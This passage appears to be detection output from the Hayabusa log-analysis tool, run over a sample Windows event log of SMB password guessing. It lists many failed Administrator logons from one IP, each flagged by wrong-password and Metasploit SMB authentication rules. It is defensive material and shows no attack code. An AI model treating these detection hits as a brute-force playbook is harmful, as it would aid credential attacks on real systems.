Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 